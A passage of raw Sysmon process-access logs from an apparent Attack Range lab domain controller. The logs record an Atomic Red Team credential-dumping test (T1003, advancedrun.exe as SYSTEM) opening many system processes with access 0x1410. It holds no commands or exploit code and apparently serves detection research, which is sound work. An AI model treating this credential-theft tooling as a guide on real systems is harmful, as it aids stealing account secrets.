Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952009Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952008Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952007Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952005Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952004Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952003Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952001Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003952000Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003951999Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003951998Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003951997Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003951996Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003951995Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003951994Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003951993Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003951992Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:28:39.308{834264DD-ED47-61EA-7903-000000002702}1108680C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedR